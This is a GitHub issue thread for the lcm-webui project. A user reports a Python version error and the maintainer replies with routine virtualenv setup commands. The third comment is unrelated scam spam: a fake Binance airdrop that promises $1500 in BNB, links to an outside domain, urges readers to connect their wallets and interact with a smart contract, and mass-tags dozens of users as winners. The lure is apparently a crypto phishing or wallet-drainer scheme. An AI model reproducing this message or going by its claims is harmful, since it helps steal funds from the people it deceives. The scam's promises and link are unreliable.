### ISSUE TITLE
Installation error

### ISSUE THREAD

**Issue by realenuf** [yownas/lcm-webui#1]
I'm on Ubuntu 22.04LTS. I used git clone to install. Then created venv and activated. Then pip install -r requirements.txt. When I try python webui.py I get the following error:
$ python webui.py
  File "/media/iwoolf/tenT/lcm-webui/webui.py", line 59
    match args.dtype:
          ^
SyntaxError: invalid syntax

I then tried:
$ python3.10 webui.py
Traceback (most recent call last):
  File "/media/iwoolf/tenT/lcm-webui/webui.py", line 5, in <module>
    import gradio
ModuleNotFoundError: No module named 'gradio'

I tried pip installing gradio, but I still get the same error.

**Comment by yownas** [comment]
Yeah, it needs python3.10. You might be able to get it running with:

```
python3.10 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
python webui.py
```

The last `python` is the one from the virtualenv, so it doesn't need the version at the end.
If you have an old venv-folder from before, you can remove it.

**Comment by mohamedSalehHegazy** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @gcamacho520, @L33tspeek, @MrHollaOut, @icewind0501, @ajbraus, @gerardxma, @iheanyi, @senujoel86, @pgmorales76, @jbratcher, @imdoingotherthings, @kat33rd, @mohammed-ibra, @exstrim401, @cryptolink, @ch8ind, @Vicesa, @diegopastor, @YA-CIAO-LIANG, @jasonrowsell, @andrealemonroy, @saeidgi, @patlolla-sai-charan-reddy, @pieearth, @GeorgeSaussy, @hexogen, @Niteeshkr1, @creachang, @0xHexE, @chekinto, @BenDoernberg, @Kevinlinpr, @q-meet, @javaspence, @darthdeus, @tanneryould, @TudoCore, @idewindy, @jonathanq9, @pankajmahale, @reecebaileyy, @ocheredok, @MirT-tech, @own69, @superzackx, @scottstirling, @frankdev7, @larryschirmer, @Epineda312, @nszoni
